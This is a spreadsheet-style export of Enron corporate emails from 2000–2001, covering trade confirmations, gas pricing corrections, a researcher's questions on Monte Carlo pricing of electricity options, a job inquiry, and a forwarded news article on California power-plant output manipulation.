We did not have enough time to discuss anything deeply so, you asked me_x000D_
to send all_x000D_
the questions by email._x000D_
_x000D_
If you are in London, it would be for me a pleasure to meet you here for_x000D_
lunch some day and then_x000D_
we could talk much better about everything. If you can not, it will be_x000D_
ok to use the email._x000D_
_x000D_
I hope you can find some time to help me with this. Of course, I thank_x000D_
you very much in_x000D_
advance for your help because I understand you are very busy._x000D_
_x000D_
The main questions I need to be solved are the following:_x000D_
_x000D_
1. This first question is very important because I want to know how to_x000D_
use Monte Carlo_x000D_
    methods for pricing all kind of options on the forward price when no_x000D_
analytical formula_x000D_
    is available. To understand the procedure I have compared the_x000D_
analytical formula with_x000D_
    the monte carlo results. For example, when the price follows the_x000D_
geometric brownian_x000D_
    motion I have programed the analytical_x000D_
    expression for a call on the forward price (see attached file in_x000D_
matlab: price_gbm.m)_x000D_
    (which corresponds with formula 6.5 in the book) together with_x000D_
    the monte carlo method proposed in your book with Clewlow and_x000D_
Strickland (chapter 7,_x000D_
    see attached file: price_gbmMC.m). In this case I achieve the same_x000D_
results. However,_x000D_
    if I try to do the same exercise when the underlying follows the_x000D_
simplest mean reversion_x000D_
    process (formula 6.6), I obtain very different results using formula_x000D_
(6.12) in the book (I think there_x000D_
    is a printing mistake on it) and the Monte Carlo techniques. I do_x000D_
not really understand_x000D_
    what might be happening. You suggested me to send to you the matlab_x000D_
files to check them_x000D_
    more carefully. The names are price_mr.m and price_mrMC.m for the_x000D_
analytical and monte_x000D_
    carlo respectively._x000D_
_x000D_
    2. Could it be possible to have some of the data sets you use in the_x000D_
book to check if I achieve the_x000D_
        same estimated parameters with my programs ? (estimacion_mbg.m_x000D_
and estimacion_mr.m)_x000D_
_x000D_
    3.. Once you have estimated the unknown parameters from the data_x000D_
set, in_x000D_
         particular the speed of mean-reversion,_x000D_
         and, if you want to use the option formula under_x000D_
mean-reversion,_x000D_
         which is the value for this parameter_x000D_
         to introduce in the formula, the annualized one or not?_x000D_
_x000D_
4. In case I have to use the annualized value into the pricing_x000D_
formula, I have a very important question which_x000D_
   is driving my crazy._x000D_
   In the particular case of electricity price series, the estimated_x000D_
annualized speed of mean reversion I obtain are really very high,_x000D_
   and very far from zero. In this case, if you compare the pricing_x000D_
values obtained using the usual black formula_x000D_
   and the one obtained under mean-reversion, we achieve very different_x000D_
values. Is that correct? Did you have similar results_x000D_
   to mine when working with electricity series? (I computed these two_x000D_
values under the same volatility)._x000D_
_x000D_
5. Going back to the previous point, why do we have to use the spot_x000D_
price volatility and not the forward volatility_x000D_
   in the pricing formula?_x000D_
   I do not understand why, since the underlying in this case is the_x000D_
forward price._x000D_
_x000D_
6. If I compute the speed of mean-reversion for the same data set,_x000D_
working with hourly data and with daily data (constructed_x000D_
   as the sample mean of the hourly observations) I obtain very_x000D_
different values for this parameter (for the annualized value). Is that_x000D_
normal?_x000D_
   Can be the different volatility values in these two series the reason_x000D_
_x000D_
of that? Should not be both numbers very similar (the annualized ones of_x000D_
course)?_x000D_
_x000D_
7. If the estimated numbers we obtain for the speed of mean-reversion_x000D_
have to be_x000D_
different depending on the time between observations,_x000D_
   has it sense the following question? : if the underlying of my_x000D_
product is a monthly forward price, should I compute_x000D_
   the speed of mean-reversion ( I mean the annualized value) with_x000D_
monthly spot prices?_x000D_
   In such a case, I expect to obtain a value closer to zero than in the_x000D_
_x000D_
   other cases (with hourly and daily data) and then, I will obtain a_x000D_
pricing value not as different_x000D_
   to that obtained with the usual Black formula._x000D_
_x000D_
8. Finally, can you give me references (papers, working papers,...)_x000D_
about who to value swing options ?_x000D_
_x000D_
Thank you very much in advance. You can not imagine how much I_x000D_
appreciate your answers. Looking forward to hearing from you._x000D_
_x000D_
Best regards,_x000D_
_x000D_
Lorenzo Pascual._x000D_
_x000D_
 - estimacion_mr.m _x000D_
 - estimacion_mbg.m _x000D_
 - price_gbmMC.m _x000D_
 - price_gbm.m _x000D_
 - price_mrMC.m _x000D_
 - price_mr.m </t>
  </si>
  <si>
    <t>Tue, 13 Feb 2001 06:35:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Prebon 2/13 errors</t>
  </si>
  <si>
    <t xml:space="preserve">521628 and 522087 - both are sells to Sierra Pacific - 25 mw each for a total _x000D_
of 50 mw sale to SP._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Evelyn Metoyer@ENRON_x000D_
02/13/2001 02:32 PM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Re: Prebon 2/13 errors  _x000D_
_x000D_
Can you have Mike double check the volume for the Sierra Pacific deal.  I _x000D_
looked back over my notes and I put 25 then I put 50._x000D_
_x000D_
Thanks!!_x000D_
_x000D_
_x000D_
   Kate Symes @ ECT                02/13/2001 04:22 PM_x000D_
_x000D_
To: Evelyn Metoyer/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: Prebon 2/13 errors  _x000D_
_x000D_
521620 - changed to Amerex_x000D_
_x000D_
And Mike Driscoll is entering the Sierra Pacific sell right now._x000D_
_x000D_
_x000D_
_x000D_
Evelyn Metoyer@ENRON_x000D_
02/13/2001 02:25 PM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Prebon 2/13 errors_x000D_
_x000D_
 _x000D_
_x000D_
Mike Swerzbin:_x000D_
deal 521620_x000D_
Prebon does not recognize_x000D_
_x000D_
_x000D_
Mike Swerzbin:_x000D_
I am missing a sell to Sierra Pacific 50 mw  Q2 Palo Verde  off-peak at $125_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 14 Feb 2001 02:18:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kam.keiser@enron.com', 'david.baumbach@enron.com', 'darron.giron@enron.com'})</t>
  </si>
  <si>
    <t>Gas Daily pricing 12/30-12/31</t>
  </si>
  <si>
    <t xml:space="preserve">I got an update from Bryce.  In the back of the publication for 1/2/01(page _x000D_
7), there are prices for the 30th &amp; 31st.  It appears the 30th &amp; 31st got pub _x000D_
posted at the first page of the 1/2/01 publication.  Therefore, we are going _x000D_
to see OA on these deals._x000D_
PL_x000D_
_x000D_
---------------------- Forwarded by Phillip M Love/HOU/ECT on 02/14/2001 _x000D_
10:11 AM ---------------------------_x000D_
_x000D_
_x000D_
Phillip M Love_x000D_
02/14/2001 09:59 AM_x000D_
To: David Baumbach/HOU/ECT@ECT, Darron C Giron/HOU/ECT@ECT, Kam _x000D_
Keiser/HOU/ECT@ECT_x000D_
cc: Jeffrey C Gossett/HOU/ECT@ECT _x000D_
Subject: Gas Daily pricing 12/30-12/31_x000D_
_x000D_
FYI,_x000D_
I wanted to let you guys know of an OA problem that I am seeing on the _x000D_
central desk for december 2000.  It appears deals that are gas daily priced _x000D_
deals are being priced incorrectly in Unify.  Two gas daily publications came _x000D_
out at the end of the year.  The publication on the 29th was for trans. dated _x000D_
the 28th and flowing the 29th.  The next gas daily publication  came out on _x000D_
the 2nd of Jan. and was for trans. 29th flowing the 1st adn 2nd.  We flashed _x000D_
gas daily prices for the 30th &amp; 31st that equalled the GD publication of the _x000D_
2nd.  This is correct, we should pay sat. and sunday based on Monday's _x000D_
price.  Settlements paid the 30th &amp; 31st at the 29th's price.  I am going to _x000D_
give Bryce a call, I just wanted to share this with you since you should be _x000D_
seeing OA forms starting today for Dec production.  If you disagree with my _x000D_
logic, please give me a shout. Thanks._x000D_
PL_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 27 Mar 2001 10:21:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'guenther.klar@enron.com', 'paul.johnson@enron.com', 'rod.nelson@enron.com', 'eva.hoeffelman@enron.com', 'claire.wright@enron.com', 'gail.hill@enron.com', 'jonathan.marsh@enron.com', 'sara.shackleton@enron.com', 'tom.doukas@enron.com', 'john.bottomley@enron.com', 'raewyn.perkins@enron.com', 'heidi.mason@enron.com', 'jan-erland.bekeng@enron.com', 'sue.kelly@enron.com', 'richard.kerr@enron.com', 'angela.brown@enron.com', 'jitendra.patel@enron.com', 'jane.mcbride@enron.com', 'hector.mcloughlin@enron.com'})</t>
  </si>
  <si>
    <t>FYI: Structured Finance Team</t>
  </si>
  <si>
    <t xml:space="preserve">Note that Enron Trading Ltd (Cayman) and Enron Metals (Malta) Ltd are _x000D_
entities associated purely with this group._x000D_
The actual people involved are in the To: field below._x000D_
_x000D_
_x000D_
---------------------- Forwarded by Kathryn Thomas/LON/ECT on 27/03/2001 _x000D_
10:51 ---------------------------_x000D_
_x000D_
_x000D_
Bryan Seyfried_x000D_
20/03/2001 13:12_x000D_
To: Enron Credit London, Enron Credit Houston, Peter A Abdo/EU/Enron@Enron, _x000D_
George DelCanto/EU/Enron@Enron, Ray Carter/NA/Enron@Enron, Angel _x000D_
Tamariz/NA/Enron@Enron, Felipe Borlido/SA/Enron@Enron, Antonio _x000D_
Vildoso/ENRON@enronXgate, Serene Ho/SIN/ECT@ECT, Manjeet Jones/EU/Enron@Enron_x000D_
cc: Joe Gold/LON/ECT@ECT, Paul Chivers/LON/ECT@ECT, Michael R _x000D_
Brown/LON/ECT@ECT, John Sherriff/LON/ECT@ECT, Ted Murphy/LON/ECT@ECT, Fernley _x000D_
Dyson/LON/ECT@ECT, Drew C Lynch/LON/ECT@ECT _x000D_
_x000D_
Subject: Financial Markets Team_x000D_
_x000D_
I am pleased to announce that the Financial Markets team led by  George Del _x000D_
Canto and Peter Abdo in London and Ray Carter in Houston will be joining _x000D_
Enron Credit effective 1 April.  In addition to an established business model _x000D_
with assets across the globe, the team brings senior origination capabilities _x000D_
in the global markets which will greatly increase our capabilities and _x000D_
reach.  Please take the time to meet the team and share ideas._x000D_
_x000D_
Bryan_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 21 Nov 2001 07:51:38 -0800 (PST)</t>
  </si>
  <si>
    <t>misc</t>
  </si>
  <si>
    <t>Hey, we will call you tomorrow from Jean's house.  Will you be home or_x000D_
are you going somewhere for Thanksgiving?  What is the status of your_x000D_
stock price 2day?</t>
  </si>
  <si>
    <t>Mon, 19 Nov 2001 10:15:08 -0800 (PST)</t>
  </si>
  <si>
    <t>so are you going to tell me or just leave me hanging out here?</t>
  </si>
  <si>
    <t>Fri, 5 Jan 2001 07:27:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Daily firm webtext</t>
  </si>
  <si>
    <t xml:space="preserve">Michelle:  FTS-1 (daily) text attached.  The only difference between this and _x000D_
the FTS-1 text is in the "Term" portion of the form agreement._x000D_
_x000D_
_x000D_
_x000D_
My contact info for Monday:  _x000D_
_x000D_
Mobile: 713-494-5002_x000D_
D.C. office (after 12:30-ish):  202-828-3360 (meeting with Nancy Bagot)_x000D_
_x000D_
Tuesday I'll be out of pocket most of the day but will check voice mail when _x000D_
I can._x000D_
</t>
  </si>
  <si>
    <t>Tue, 23 Oct 2001 11:56:31 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'g..barkowsky@enron.com'})</t>
  </si>
  <si>
    <t>Crestone Service - September 2001</t>
  </si>
  <si>
    <t xml:space="preserve">Gloria and Megan,_x000D_
here is the Crestone Gathering Service and Fuel Sale for September 2001._x000D_
_x000D_
(Megan - Do you finalize the Fuel Sale to Crestone?  (I'm having a brain freeze today and I can't remember).)_x000D_
_x000D_
Call me if you have any questions._x000D_
_x000D_
Theresa_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Fri, 26 Jan 2001 02:44:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'rusamarts@aol.com'})</t>
  </si>
  <si>
    <t>Re: request from a penn alumni</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks for the email.  Can you fax or email a  resume to me.  After I review, _x000D_
I'll reply with more info.  _x000D_
_x000D_
Regards,_x000D_
_x000D_
Jeff_x000D_
_x000D_
_x000D_
_x000D_
	RusAmArts@aol.com_x000D_
	01/26/2001 10:40 AM_x000D_
		 _x000D_
		 To: jshankm@enron.com_x000D_
		 cc: _x000D_
		 Subject: request from a penn alumni_x000D_
_x000D_
Dear Mr. Shankman,_x000D_
     I obtained your name from the Penn Alum Network.  Sorry if this email is _x000D_
a bit long.  I came across a listing for a position with Enron in NY and am _x000D_
highly interested in applying for it. But, I would like to ask your advice _x000D_
regarding the approach I should take._x000D_
     When I was an undergraduate at Penn (Wharton &amp; CAS), I started my own _x000D_
fertilizer trading company.  With zero capital and zero contacts in the _x000D_
industry, I built up a company with $ 15 mil in revenues and clients all over _x000D_
the world.  I personally developed relationships with clients like ConAgra, _x000D_
Transammonia, Mitsui and numerous others in Latin America and Europe.  _x000D_
     Six years ago, outside factors forced me to join my family business, _x000D_
which is in the entertainment industry.  Now, I am at a point where I can, _x000D_
and want, to return to what I originally did.  The Enron position describes _x000D_
the exact objectives I faced in developing my own company - selling to large _x000D_
commercial and industrial customers.  That is exactly what I did and did _x000D_
well.  But, I am afraid that if I send my resume to the Human Resource dept.  _x000D_
they will overlook my early experience and will be confused why a Broadway _x000D_
producer is applying for the job._x000D_
     Do you happen to have any suggestions ?  Perhaps you might know someone _x000D_
in the New York office that I can meet with.  I am very interested in working _x000D_
for Enron and know that I posses the right skills.  I would greatly _x000D_
appreciate your advice._x000D_
Thank you,_x000D_
Rina Kirshner_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 5 Mar 2001 06:45:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">waiting for Mike to come back from off-site meeting - out of curiosity, _x000D_
537949 is a light load deal - is that it? _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Kerri Thompson@ENRON_x000D_
03/05/2001 02:36 PM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: natsource_x000D_
_x000D_
537948_x000D_
_x000D_
broker has light load_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>frozenset({'mlk@pkns.com', 'sbishop@gibbs-bruns.com', 'gfergus@brobeck.com'})</t>
  </si>
  <si>
    <t>SF Chronicle article</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Richard B Sanders/HOU/ECT on 05/21/2001 08:06 AM -----_x000D_
_x000D_
	Michael Tribolet/ENRON@enronXgate_x000D_
	05/21/2001 07:55 AM_x000D_
		 _x000D_
		 To: Richard Shapiro/NA/Enron@Enron, James D Steffes/NA/Enron@Enron, Harry _x000D_
Kingerski/NA/Enron@Enron, Robert _x000D_
Neustaedter/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Chip _x000D_
Schneider/ENRON@enronXgate, Lisa Mellencamp/HOU/ECT@ECT, Richard B _x000D_
Sanders/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: SF Chronicle article_x000D_
_x000D_
_x000D_
------------------------------------------------------------------------------_x000D_
--_x000D_
 _x000D_
Power juggling ramped up price _x000D_
Insiders say manipulation also strained equipment_x000D_
_x000D_
Christian Berthelsen, Scott Winokur, Chronicle Staff Writers    Sunday, May _x000D_
20, 2001 _x000D_
  _x000D_
_x000D_
------------------------------------------------------------------------------_x000D_
--_x000D_
 _x000D_
_x000D_
_x000D_
Large power companies have driven up electricity prices in California by _x000D_
throttling their generators up and down to create artificial shortages, _x000D_
according to dozens of interviews with regulators, lawyers and energy _x000D_
industry workers. _x000D_
_x000D_
Those sources say the unusual maneuvers not only jacked up prices but also _x000D_
wore down equipment and contributed to the record levels of plant shutdowns _x000D_
that are depriving the state of much-needed electricity. The accounts are _x000D_
supported by an independent review of shutdown data by The Chronicle. _x000D_
_x000D_
The California Energy Commission calculates that an average of 14,990 _x000D_
megawatts of generating capacity, nearly a third of the state's total, was _x000D_
unavailable each day in April because of plant shutdowns, more than four _x000D_
times as much as a year ago. _x000D_
_x000D_
Such shutdowns are the subject of increasing scrutiny as California enters _x000D_
another period of high demand, the warm spring and summer months of May to _x000D_
September, when electricity usage normally grows by a third. _x000D_
_x000D_
Loretta Lynch, president of the California Public Utilities Commission, said _x000D_
last week the agency has found considerable evidence of suspicious plant _x000D_
shutdowns. And the California Independent System Operator, which manages the _x000D_
state's power grid, says plant shutdowns have now become the primary means of _x000D_
constricting supply. _x000D_
_x000D_
But an extensive investigation by The Chronicle has found that not only were _x000D_
generators shut down to boost prices but these "gaming" tactics contributed _x000D_
to the plants' deteriorating condition. _x000D_
_x000D_
"We suspected it," said Jim MacIntosh, the manager of grid operations for the _x000D_
ISO. "It was a sure factor in driving up prices." Such swings in unit output, _x000D_
he said, "would only make sense in a scenario when they're trying to game _x000D_
something. Otherwise, why would they do that? They're tearing their units _x000D_
up." _x000D_
_x000D_
Unusual phone calls _x000D_
_x000D_
Operators at a San Bernardino County power plant owned by Reliant Energy Inc. _x000D_
say a complex plan to manipulate the California energy market began early _x000D_
last year with a series of unusual telephone calls from the company's _x000D_
headquarters in Houston. _x000D_
_x000D_
According to the accounts of three plant operators, Reliant's operations _x000D_
schedulers on the energy trading floor ordered them to repeatedly decrease, _x000D_
then increase output at the 1,046-megawatt Etiwanda plant. This happened as _x000D_
many as four or five times an hour. Each time the units were ramped down and _x000D_
electricity production fell, plant employees watched on a control room _x000D_
computer screen as spot market energy prices rose. Then came the phone call _x000D_
to ramp the units back up. _x000D_
_x000D_
"They would tell us what to do, and we would do it," said one of the men, who _x000D_
only agreed to speak on condition they not be identified because they fear _x000D_
being fired. "Afterward, we would just sit there and watch the market _x000D_
change." _x000D_
_x000D_
The workers said frequent and large swings in electricity output began at a _x000D_
number of California power plants just as the state's power crisis began in _x000D_
earnest. The workers and state power authorities assert the swings were one _x000D_
of the primary means of gaming the wholesale energy market. _x000D_
_x000D_
"It appears the control rooms are responsive to direction from the trading _x000D_
floors in Houston, rather than the reliability needs of the ISO," said Carl _x000D_
Wood, a commissioner with the utilities commission who is overseeing that _x000D_
agency's investigation into plant outages. "Instead of being responsive to _x000D_
demands for reliability, they're responsive to demands for profitability." _x000D_
_x000D_
Corporate denial _x000D_
_x000D_
Reliant officials adamantly deny using this tactic or any other mechanism to _x000D_
game the California energy market. They and other power companies, including _x000D_
AES Corp. and a partnership between NRG Energy Inc. and Dynegy Inc., have _x000D_
asserted that skyrocketing electricity demand forced them to run aging, _x000D_
decrepit power plants harder than ever to meet California's needs. _x000D_
_x000D_
While acknowledging that the company issued changes in output levels as _x000D_
frequently as every 10 minutes, company officials said it was done at the _x000D_
instructions of the ISO to maintain supply-demand balance. _x000D_
_x000D_
"As a part of routinely doing business within California and the California _x000D_
market design, we are required to do that," said Kevin Frankeny, an _x000D_
operations official with Reliant. "When the ISO (issues dispatch orders), _x000D_
they dispatch on a 10-minute basis. It can go up and down many times within _x000D_
an hour." _x000D_
_x000D_
Frankeny said he was not aware of any instances in which Reliant schedulers _x000D_
in Houston ordered dispatch changes without the ISO directing them to do it _x000D_
first. _x000D_
_x000D_
The ISO refused to comment on operations at any specific facility, but _x000D_
Stephanie McCorkle, an ISO spokeswoman, said the ramping tactics were used _x000D_
beyond dispatch instructions during periods of tight supply. And one of the _x000D_
plant operators said the orders to vary output came independently of the grid _x000D_
managers. "ISO was not calling Reliant every 10 minutes for that," said one _x000D_
of the operators. "Not for an individual unit." _x000D_
_x000D_
Officials with the California attorney general's office declined to comment _x000D_
on the legality of the ramping practice, citing a continuing investigation _x000D_
into whether wholesale energy prices are being manipulated. One source _x000D_
familiar with the state of various inquiries said the ramping, if proved to _x000D_
have been done to drive up prices, could violate the state's unfair business _x000D_
practices laws. _x000D_
_x000D_
Invisible practice _x000D_
_x000D_
How could companies such as Reliant tinker with output and not get caught? _x000D_
_x000D_
One of the plant workers said the practice was designed to be virtually _x000D_
invisible to regulators and grid operators. _x000D_
_x000D_
When power companies bid on hourly contracts, they agree to produce a certain _x000D_
amount of electricity over the given hour. Generators are paid based on an _x000D_
average of the spot market prices for that hour. By driving up the spot _x000D_
price, they can increase their hourly profits and still produce the total _x000D_
amount of energy required. _x000D_
_x000D_
The plant worker said the units would be ramped down immediately after their _x000D_
output measurement, which was performed at the top of each hour by the ISO. _x000D_
Then, he said, it was brought back up as the spot market price of electricity _x000D_
rose in response to the reduced output. By the time the ISO measured again, _x000D_
the output was back at the expected level. _x000D_
_x000D_
Another operator said the units were not always ramped up and down - that if _x000D_
the price reached a satisfactory level, generators would raise output and _x000D_
remain at that level as long as the price was right. Other times, if the _x000D_
price was low, output was brought down and kept down. _x000D_
_x000D_
The same operator said the amount of ramping appeared to be a matter of _x000D_
individual will of the company schedulers in Houston, with some being more _x000D_
aggressive than others. _x000D_
_x000D_
"What they would do, especially late at night, is if the price tanked, they _x000D_
would undergenerate," an operator said. "Then, mysteriously, the price would _x000D_
go up. _x000D_
_x000D_
"Then, if the schedule was at 70 (required megawatt hours of output), they'd _x000D_
say, 'Go up to 90.' That would cause the price to tank. And they'd say, _x000D_
'Bring it down again.' " _x000D_
_x000D_
Rapid changes _x000D_
_x000D_
These fluctuations occurred within time spans of as little as 10 to 15 _x000D_
minutes, the operators said. But acceptable rates for bringing a unit from _x000D_
minimum to maximum levels when the plant was owned by Southern California _x000D_
Edison were more like 80 minutes, to avoid stressing the machinery, one of _x000D_
the workers said. Moreover, they were typically run at constant levels, which _x000D_
also reduced wear and tear. _x000D_
_x000D_
"They were basically ramping up as fast as they can, and then slamming the _x000D_
brakes on," said one of the operators. "They were increasing the fatigue on _x000D_
the units." _x000D_
_x000D_
ISO officials say they changed market operations last fall to crack down on _x000D_
gaming tactics, including instituting a so-called 10-minute market, rather _x000D_
than the hourly market, so that it could be more easily detected when _x000D_
companies were withholding power. _x000D_
_x000D_
But the ISO says generator outages have now become the primary tactic in _x000D_
driving up energy prices. _x000D_
_x000D_
A computer analysis by The Chronicle of shutdown data over a recent 39-day _x000D_
period shows Reliant and three other generating companies topped the list of _x000D_
plant shutdowns. Reliant also represented the largest amount of wattage lost _x000D_
among those companies. _x000D_
_x000D_
Plants owned by Reliant, AES, Mirant Corp. and Duke Energy Inc. accounted for _x000D_
more than half of the state's unplanned shutdowns, even though their _x000D_
generating capacity was no more than 25 percent of the state's total capacity _x000D_
from all sources. _x000D_
_x000D_
Reliant, one of California's largest and most profitable out-of-state _x000D_
generators, reported 319 shutdowns during the period in March and April. It _x000D_
was followed by Mirant Corp. of Atlanta (310), AES Corp. of Arlington, Va. _x000D_
(278) and Duke Energy North America of Charlotte, N.C. (261). _x000D_
_x000D_
Reliant's unplanned shutdowns deprived the system of more than 53,000 _x000D_
megawatts over the 40-day period, an average of 1,368 per day - enough power _x000D_
for 1.4 million homes for one hour. _x000D_
_x000D_
Its Ormond Beach plant in Oxnard, with one generating unit down for 26 days, _x000D_
_x000D_
accounted for more than 30,000 of those missed megawatts. However, an _x000D_
operator who worked in that plant said the outages there appeared to be the _x000D_
result of legitimate equipment failures. _x000D_
_x000D_
Reliant says there are valid reasons for its plants now to be in need of _x000D_
repair. They are old: At 48, Etiwanda is the oldest of Reliant's five _x000D_
California plants. And the company says routine maintenance was deferred so _x000D_
the plants could remain in service during times of high summer demand. _x000D_
_x000D_
But the operators said the issue is not so clear-cut. One problem at _x000D_
Etiwanda, a tube leak, had been present for about a month and was previously _x000D_
reported to management, they said, but it had not deteriorated much, it was _x000D_
operating at full capacity and there was no immediate need to take the unit _x000D_
offline because of the problem. _x000D_
_x000D_
Moreover, at the time of the shutdown, the ISO had expressly asked Reliant to _x000D_
keep the unit online, the operators said. Richard Wheatley, a spokesman for _x000D_
Reliant, denied that any Reliant unit was taken offline for unnecessary _x000D_
maintenance. _x000D_
_x000D_
Ramping may be rampant _x000D_
_x000D_
Sources say Reliant was not alone in using the ramping practice. A source _x000D_
familiar with the state utilities commission investigation said output logs _x000D_
obtained from AES' Alamitos plant also reflected production fluctuations. And _x000D_
an operator who has worked at the El Segundo plant co-owned by NRG and Dynegy _x000D_
said the practice was used there, although less frequently. The scheduling _x000D_
calls came from Dynegy's trading floor in Houston, rather than NRG in _x000D_
Minneapolis, he said. _x000D_
_x000D_
Steve Stengel, a spokesman for Dynegy, said changes in output at El Segundo _x000D_
were a normal function of changing demand levels throughout the day, and _x000D_
denied the company was engaged in gaming the California market. _x000D_
_x000D_
In a May 2000 report, the California Energy Commission cited Reliant's _x000D_
Etiwanda plant, as well as the Alamitos and El Segundo plants, as some of the _x000D_
"major beneficiaries of high real-time prices" that spring. _x000D_
_x000D_
One way to obtain those high prices, the plant workers said, was the simple _x000D_
method of demanding a sky-high price and refusing to deliver power if that _x000D_
price was not met. _x000D_
_x000D_
On one occasion, one operator said, Reliant ordered a unit at Etiwanda to be _x000D_
shut off because the ISO would not meet the price of $1,000 per megawatt _x000D_
hour, even though the legal price cap at the time was $750. _x000D_
_x000D_
"The operator said, 'It's our unit, shut it off,' " the source said. _x000D_
_x000D_
_x000D_
E-mail Christian Berthelsen at cberthelsen@sfchronicle.com and Scott Winokur _x000D_
at swinokur@sfchronicle.com. _x000D_
 _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 28 Feb 2000 08:08:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: TW position in All-Party Settlement Proposal</t>
  </si>
  <si>
    <t xml:space="preserve">I'm a little uncomfortable with saying "TW defers to the consensus position _x000D_
of the non-SoCal settlement parties" so often.  Could we just not say _x000D_
anything on those items?  Or say TW has no comment at this time.  Would the _x000D_
other parties be put off if we were silent on these issues?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Jeffery Fawcett_x000D_
02/28/2000 03:43 PM_x000D_
To: mbaldwin@igservices.com_x000D_
cc:  (bcc: Susan Scott/ET&amp;S/Enron)_x000D_
_x000D_
Subject: TW position in All-Party Settlement Proposal_x000D_
_x000D_
Attached see my marked-up version of your work product.  Mark, I think you _x000D_
did an excellent job of identifying TW's position in all of the issue in the _x000D_
GIR.  However, on editing, you'll see that I truncated some of the TW _x000D_
comments in favor of a slightly shorter document -- particularly in those _x000D_
areas in which it was questionable whether we have a direct interest or not.  _x000D_
Look over and give me your feedback.  Thanks._x000D_
_x000D_
I understand we're supposed to offer these comments to Craig as soon as _x000D_
possible for possible inclusion in a 2nd generation "issue matrix?"_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 14 Sep 2001 14:53:38 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'stacey.richardson@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'debra.perlingiere@enron.com', 'e..dickson@enron.com', 'veronica.espinoza@enron.com', 'gerald.nemec@enron.com', 's..theriot@enron.com', 'darren.vanek@enron.com', 'credit &lt;.williams@enron.com&gt;', 't..hodge@enron.com', 's..bryan@enron.com'})</t>
  </si>
  <si>
    <t>GTC Deal Clearing Count for August 2001</t>
  </si>
  <si>
    <t>Well, it's a little late, but attached please find the GTC deal clearing report for August.  Per previous discussions, the report lists all counterparties with 100 or more transactions clearing on online GTCs, 100 or more deals clearing on spot GTCs, and/or 30 or more deals on firm GTCs.  Please let me know if you have any questions or if you think these thresholds need to be changed._x000D_
_x000D_
 _x000D_
_x000D_
Thanks!_x000D_
_x000D_
Stacey Barclay Richardson_x000D_
Enron Net Works, LLC - Global Contracts_x000D_
Stacey.Richardson@enron.com_x000D_
(713) 853-0569 Office_x000D_
(713) 646-2495 Fax_x000D_
(713) 710-6084 Pager</t>
  </si>
  <si>
    <t>Mon, 13 Nov 2000 02:40:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'chris.gaskill@enron.com'})</t>
  </si>
  <si>
    <t>Re: A&amp;M/UT Flag Football Invitation</t>
  </si>
  <si>
    <t xml:space="preserve">Eric,_x000D_
_x000D_
I checked on Saturday and remembered that we have friends from Austin comin=_x000D_
g=20_x000D_
into town.  Sorry that I couldn't help out._x000D_
_x000D_
Chris_x000D_
_x000D_
_x000D_
  =20_x000D_
=09_x000D_
=09_x000D_
=09From:  Eric Bass @ ECT                           11/13/2000 10:34 AM_x000D_
=09_x000D_
_x000D_
To: Chris Gaskill/Corp/Enron@Enron_x000D_
cc: =20_x000D_
_x000D_
Subject: A&amp;M/UT Flag Football Invitation_x000D_
_x000D_
Here is the info on the tourney.  We are one person short and could really=_x000D_
=20_x000D_
use your help.  Please try to let me know ASAP whether you can play so I ca=_x000D_
n=20_x000D_
explore other alternatives._x000D_
_x000D_
Thanks,_x000D_
_x000D_
_x000D_
Eric_x000D_
x3-0977_x000D_
---------------------- Forwarded by Eric Bass/HOU/ECT on 11/13/2000 10:32 A=_x000D_
M=20_x000D_
---------------------------_x000D_
  =20_x000D_
=09Enron North America Corp._x000D_
=09_x000D_
=09From:  Flag Football Challenge @ ENRON                           10/21/2=_x000D_
000=20_x000D_
10:38 PM_x000D_
=09_x000D_
_x000D_
Sent by: Enron Announcements@ENRON_x000D_
To: Flag Football Invite_x000D_
cc: =20_x000D_
Subject: A&amp;M/UT Flag Football Invitation_x000D_
_x000D_
                =20_x000D_
_x000D_
Enron and Andersen Consulting are proud to sponsor the 2nd Annual=20_x000D_
Aggie-Longhorn=20_x000D_
Flag Football Challenge on Saturday, November 18.  The purpose of this even=_x000D_
t=20_x000D_
is to=20_x000D_
raise money for both schools, and to enjoy the competitive spirit of the=20_x000D_
third oldest rivalry=20_x000D_
in college football.  This year's game marks the 107th meeting between Texa=_x000D_
s=20_x000D_
A&amp;M=20_x000D_
University and The University of Texas, and, with a little luck, the Big 12=_x000D_
=20_x000D_
South Title=20_x000D_
will be on the line!_x000D_
_x000D_
Enron and Andersen Consulting are sponsoring the event, but we need your he=_x000D_
lp=20_x000D_
